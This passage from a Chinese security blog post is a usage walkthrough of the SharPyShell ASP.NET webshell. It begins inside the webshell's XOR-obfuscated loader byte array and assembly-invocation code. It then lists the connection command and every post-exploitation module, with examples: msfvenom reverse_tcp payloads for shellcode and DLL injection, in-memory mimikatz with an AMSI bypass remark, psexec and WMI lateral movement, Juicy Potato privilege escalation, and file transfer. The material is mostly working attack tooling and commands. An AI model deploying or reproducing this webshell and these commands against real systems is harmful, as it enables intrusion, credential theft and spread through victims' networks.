6,0x56,0x31,0x8,0x31,0x41,0x30,0xf,0x37,0x3,0x66,0x4d,0x35,0xc,0x32,0xe,0x30,0xc,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x82,0x3d,0xbd,0x60,0x66,0x34,0x30,0x30,0x30,0x34,0x17,0x35,0x4a,0x62,0x50,0x64,0x5f,0x31,0x5,0x32,0x25,0x39,0xa,0x34,0x5b,0x32,0x50,0x64,0x7f,0x35,0x5c,0x31,0x3,0x65,0x5b,0x63,0x63,0x37,0x8c,0x67,0x37,0x31,0x67,0x31,0x2,0x30,0x53,0x37,0x52,0x66,0x9,0x35,0x55,0x32,0x55,0x30,0x0,0x66,0x8,0x38,0x39,0x38,0x4f,0x32,0x30,0x39,0x60,0x61,0x20,0x34,0x58,0x30,0xf,0x34,0x6,0x35,0x7c,0x62,0x5c,0x64,0x42,0x31,0x1,0x32,0x11,0x39,0xa,0x34,0x47,0x32,0x41,0x64,0x5f,0x35,0x5d,0x31,0xb,0x65,0x34,0x63,0x63,0x37,0x14,0x66,0x37,0x31,0x56,0x31,0x3a,0x30,0x62,0x37,0x24,0x66,0x50,0x35,0x9,0x32,0x4,0x30,0x34,0x66,0x5d,0x38,0x4b,0x38,0x10,0x32,0x5b,0x39,0xe,0x61,0x8,0x34,0x31,0x30,0x63,0x34,0x53,0x35,0x16,0x62,0x9,0x64,0x1f,0x31,0x52,0x32,0x4d,0x39,0x53,0x34,0x37,0x32,0x61,0x64,0x2f,0x35,0x33,0x31,0x2c,0x65,0x5a,0x63,0x17,0x37,0x51,0x66,0x45,0x31,0x8,0x31,0x53,0x30,0xf,0x37,0x2c,0x66,0x58,0x35,0x8,0x32,0x4,0x30,0x62,0x66,0x4a,0x38,0x4c,0x38,0xd,0x32,0x46,0x39,0x8,0x61,0xb,0x34,0x54,0x30,0x3c,0x34,0x0,0x35,0x57,0x62,0x54,0x64,0x41,0x31,0xb,0x32,0xf,0x39,0x6,0x34,0x45,0x32,0x6a,0x64,0x4e,0x35,0x5d,0x31,0x17,0x65,0x1a,0x63,0x7,0x37,0x58,0x66,0x5b,0x31,0x66,0x31,0x32,0x30,0x4b,0x37,0x60,0x66,0x38,0x35,0x29,0x32,0x4,0x30,0x5,0x66,0x59,0x38,0x55,0x38,0x20,0x32,0x5d,0x39,0x11,0x61,0x1f,0x34,0x43,0x30,0xa,0x34,0x4,0x35,0x50,0x62,0x4d,0x64,0x31,0x31,0x42,0x32,0x63,0x39,0x3f,0x34,0x2e,0x32,0x34,0x64,0x79,0x35,0x40,0x31,0xc,0x65,0x53,0x63,0xa,0x37,0x5a,0x66,0x56,0x31,0xa,0x31,0x74,0x30,0xa,0x37,0xe,0x66,0x5c,0x35,0xb,0x32,0x0,0x30,0xf,0x66,0x5d,0x38,0x39,0x38,0x11,0x32,0x47,0x39,0xf,0x61,0x12,0x34,0x58,0x30,0xe,0x34,0x6,0x35,0x67,0x62,0x5a,0x64,0x5e,0x31,0xf,0x32,0x13,0x39,0xa,0x34,0x5b,0x32,0x50,0x64,0x44,0x35,0x6d,0x31,0x1d,0x65,0x5b,0x63,0x11,0x37,0x1a,0x66,0x53,0x31,0xa,0x31,0x5e,0x30,0x63,0x37,0x62,0x66,0xd,0x35,0x6d,0x32,0x60,0x30,0x32,0x66,0x4a,0x38,0x56,0x38,0x7,0x32,0x47,0x39,0x2,0x61,0x12,0x34,0x67,0x30,0x6,0x34,0x11,0x35,0x4b,0x62,0x50,0x64,0x5e,0x31,0xc,0x32,0x63,0x39,0x53,0x34,0x19,0x32,0x5,0x64,0x18,0x35,0x2,0x31,0x4b,0x65,0x4,0x63,0x63,0x37,0xc,0x66,0x3f,0x31,0x67,0x31,0x73,0x30,0x10,0x37,0x11,0x66,0x5c,0x35,0x8,0x32,0x3,0x30,0xe,0x66,0x41,0x38,0x19,0x38,0x35,0x32,0x57,0x39,0x13,0x61,0x15,0x34,0x58,0x30,0xc,0x34,0xd,0x35,0x38,0x62,0x9,0x64,0x1f,0x31,0x52,0x32,0x4d,0x39,0x53,0x34,0x19,0x32,0x5,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x15,0x38,0x62,0x35,0x64,0x31,0x31,0xe2,0xb,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34,0x63,0x35,0x38,0x62,0x39,0x64,0x31,0x31,0x62,0x32,0x63,0x39,0x63,0x34,0x37,0x32,0x35,0x64,0x36,0x35,0x32,0x31,0x65,0x65,0x34,0x63,0x63,0x37,0x34,0x66,0x37,0x31,0x66,0x31,0x32,0x30,0x63,0x37,0x62,0x66,0x39,0x35,0x65,0x32,0x61,0x30,0x62,0x66,0x38,0x38,0x39,0x38,0x63,0x32,0x32,0x39,0x61,0x61,0x66,0x34,0x31,0x30,0x63,0x34};` `for(int i = 0; i < a.Length; i++) a[i] ^= (byte)p[i % p.Length];` `Assembly aS = Assembly.Load(a);` `object o = aS.CreateInstance("SharPy");` `MethodInfo mi = o.GetType().GetMethod("Run");` `object[] iN = new object[] {r, p};` `object oU = mi.Invoke(o, iN);` `Response.Write(oU);``}``</script>`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

**连接Webshell：**

我们在成功连接这个Webshell后可以使用`?`查看所有功能模块，且支持使用`Tab`键补全模块名。

  

还有就是会在`C:\Windows\Temp\`下生成一个临时文件夹用于存放我们上传的文件，完成渗透工作后执行`exit`命令退出时也会自动删除这个临时文件夹。

```
python SharPyShell.py interact -u 'http://free.idcfengye.com:10430/sharpyshell.aspx' -p 'betasec'
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

**所有模块功能：**

```
 `#download               Download a file from the server`` #exec_cmd               Run a cmd.exe /c command on the server                                     `` #exec_ps                Run a powershell.exe -nop -noni -enc 'base64command' on the server         `` #inject_dll_reflective  Inject a reflective DLL in a new (or existing) process                     `` #inject_dll_srdi        Inject a generic DLL in a new (or existing) process                        `` #inject_shellcode       Inject shellcode in a new (or existing) process                            `` #invoke_ps_module       Run a ps1 script on the target server                                      `` #invoke_ps_module_as    Run a ps1 script on the target server as a specific user                   `` #lateral_psexec         Run psexec binary to move laterally                                        `` #lateral_wmi            Run builtin WMI command to move laterally                                  `` #mimikatz               Run an offline version of mimikatz directly in memory                      `` #net_portscan           Run a port scan using regular sockets, based (pretty) loosely on nmap      `` #privesc_juicy_potato   Launch InMem Juicy Potato attack trying to impersonate NT AUTHORITY\SYSTEM `` #privesc_powerup        Run Powerup module to assess all misconfiguration for privesc              `` #runas                  Run a cmd.exe /c command spawning a new process as a specific user         `` #runas_ps               Run a powershell.exe -enc spawning a new process as a specific user        `` #upload                 Upload a file to the server`
```

  

**0x05 SharPyShell模块**

#### #download

从服务器下载文件

```
`Usage：#download remote_input_path [local_output_path] [chunk_size]``C:\Windows\Temp> #download C:\ProgramData\MS16-032_x64.exe /tmp/MS16-032_x64.exe`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #exec_cmd

在服务器上运行cmd.exe /c命令

```
`Usage：#exec_cmd os_command [args]``C:\Windows\Temp> #exec_cmd whoami /priv`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #exec_ps

在服务器上运行powershell.exe -nop -noni -enc 'base64command'

```
`Usage：#exec_ps os_command [args]``C:\Windows\Temp> #exec_ps $psversiontable`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #inject_dll_reflective

使用DLL反射注入到新的进程或现有进程中，DLL必须包含`ReflectiveLoader`导出的函数，而且需要放置在modules/reflective_dll/目录下，注入类型支持：remote_virtual（默认）、remote_virtual_protect，如果没有指定进程PID时默认注入到cmd.exe进程

```
`Usage：#inject_dll_reflective dll_path [injection_type] [remote_process]``C:\Windows\Temp> #inject_dll_reflective messagebox_reflective.dll`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #inject_dll_srdi

使用DLL通用注入到新的进程或现有进程中，需要将dll文件放置在modules/dll/目录下，注入类型支持：remote_virtual（默认）、remote_virtual_protect，如果没有指定进程PID时默认注入到cmd.exe进程

```
`msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.120 lport=443 -f dll > /tmp/shellcode.dll``Usage：#inject_dll_srdi dll_path [injection_type] [remote_process]``C:\Windows\Temp> #inject_dll_srdi shellcode.dll`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #inject_shellcode

在新的进程或现有进程注入shellcode，MSF的shellcode格式为`RAW`，注入类型支持：remote_virtual（默认）、remote_virtual_protect，如果没有指定进程PID时默认注入到cmd.exe进程

```
`msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.120 lport=443 -f raw > /tmp/shellcode.bin``Usage：#inject_shellcode shellcode_path [injection_type] [remote_process]``C:\Windows\Temp> #inject_shellcode /tmp/shellcode.bin`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #invoke_ps_module

在目标服务器上运行ps1脚本

```
`Usage：#invoke_ps_module ps_module [appended_code]``C:\Windows\Temp> #invoke_ps_module clone.ps1 ';Create-Clone -u betasec123 -p pass!@#123'`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #invoke_ps_module_as

以特定用户身份在目标服务器上运行ps1脚本

```
`Usage：#invoke_ps_module_as ps_module username password [appended_code] [domain] [process_timeout_ms] [logon_type]``C:\Windows\Temp> #invoke_ps_module_as clone.ps1 betasec123 pass!@#123 ';Create-Clone -u betasec456 -p pass!@#123`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #lateral_psexec

运行psexec进行横向移动

```
`Usage：#lateral_psexec target_ip username password command [local_user] [local_password] [local_domain]``C:\Windows\Temp> #lateral_psexec 192.168.1.108 administrator pass!@#123 'cmd /c whoami'`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #lateral_wmi

运行内置WMI命令进行横向移动，需在Administrator权限下执行，SYSTEM权限执行提示：拒绝访问

```
`Usage：#lateral_wmi target_ip username password command [local_user] [local_password] [local_domain]``C:\Windows\Temp> #lateral_wmi 192.168.1.112 administrator pass!@#123 'cmd /c whoami'`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #mimikatz

直接在内存中运行mimikatz，执行类型支持：ps1（默认）、exe、reflective_dll

```
`Usage：#mimikatz [exec_type] [username] [password] [domain] [custom_command]``C:\Windows\Temp> #mimikatz ps1``C:\Windows\Temp> #mimikatz exe``C:\Windows\Temp> #mimikatz dll    //Bypass Windows Defender AMSI`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #net_portscan

使用常规套接字进行端口扫描，支持对单/多IP进行扫描

```
`Usage：#net_portscan hosts [ports] [custom_arguments]``C:\Windows\Temp> #net_portscan 192.168.1.108,192.168.1.120``C:\Windows\Temp> #net_portscan 192.168.1.0/24 '445' ' -T 5 '`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #privesc_juicy_potato

使用Juicypotato进行权限提升，执行类型支持：exe、reflective_dll（默认）

```
`Usage：#privesc_juicy_potato cmd [exec_type] [clsid] [custom_shellcode_path]``C:\Windows\Temp> #privesc_juicy_potato 'C:\ProgramData\64.exe' 'reflective_dll' '{752073A1-23F2-4396-85F0-8FDB879ED0ED}'`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #privesc_powerup

运行Powerup模块检测privesc所有错误配置，主要用于寻找可用于权限提升的脆弱Windows服务

```
`Usage：#privesc_powerup [username] [password] [domain] [custom_command]``C:\Windows\Temp> #privesc_powerup`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #runas

以特定用户身份运行cmd.exe / c

```
`Usage：#runas os_command username password [domain] [process_timeout_ms] [logon_type]``C:\Windows\Temp> #runas whoami administrator pass!@#123`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #runas_ps

以特定用户身份运行powershell.exe -enc

```
`Usage：#runas_ps os_command username password [domain] [process_timeout_ms] [logon_type]``C:\Windows\Temp> #runas_ps whoami administrator pass!@#123`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

#### #upload

将文件上传到服务器

```
`Usage：#upload local_input_path [remote_output_path] [chunk_size]``C:\Windows\Temp> #upload /tmp/local.txt C:\Windows\debug\WIA\group.txt`
```

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)

  

**注意事项：**

1.  SharPyShell v1.2.1版本中由于许可证不兼容等问题而删除了lateral_psexec模块，v1.0版本中有。
    
2.  无法直接用`cd`命令切换至带有空格的文件夹等问题，这类问题可以在该项目的Issues中查看详情。
    

*   https://github.com/antonioCoco/SharPyShell/issues/6
    

  

* * *

  

只需关注公众号并回复“9527”即可获取一套HTB靶场学习文档和视频，“1120”获取安全参考等安全杂志PDF电子版，“1208”获取个人常用高效爆破字典，“0221”获取2020年酒仙桥文章打包，还在等什么？赶紧关注学习吧！

 ![潇湘信安](http://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdSMdwH23ehXbQrbUlOvt6YLhRjHMxGMsH55CSVdlMC0XEwtoAQI06hia8rd371BcDnQ8bfRmP4YqA/0?wx_fmt=png) ** 潇湘信安 ** 一个不会编程、挖SRC、代码审计、渗透测试的业余网络安全人员，该公众号主要用于分享个人学习笔记、安全经验以及各类疑难杂症！ 75篇原创内容   公众号

* * *

**推 荐 阅 读**

  

  

  

[![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)](http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247486401&idx=1&sn=1104aa3e7f2974e647d924dfde83e6af&chksm=cfa6afd2f8d126c47d81afd02f112daea41bce45305636e3bba9a67fbdcf6dbd0e88ff786254&scene=21#wechat_redirect)

[![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)](http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247486327&idx=1&sn=71fc57dc96c7e3b1806993ad0a12794a&chksm=cfa6af64f8d1267259efd56edab4ad3cd43331ec53d3e029311bae1da987b2319a3cb9c0970e&scene=21#wechat_redirect)

[![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)](http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247484585&idx=1&sn=28a90949e019f9059cf9b48f4d888b2d&chksm=cfa6a0baf8d129ac29061ecee4f459fa8a13d35e68e4d799d5667b1f87dcc76f5bf1604fe5c5&scene=21#wechat_redirect)

* * *

**欢 迎 私 下 骚 扰**

  

  

![图片](data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==)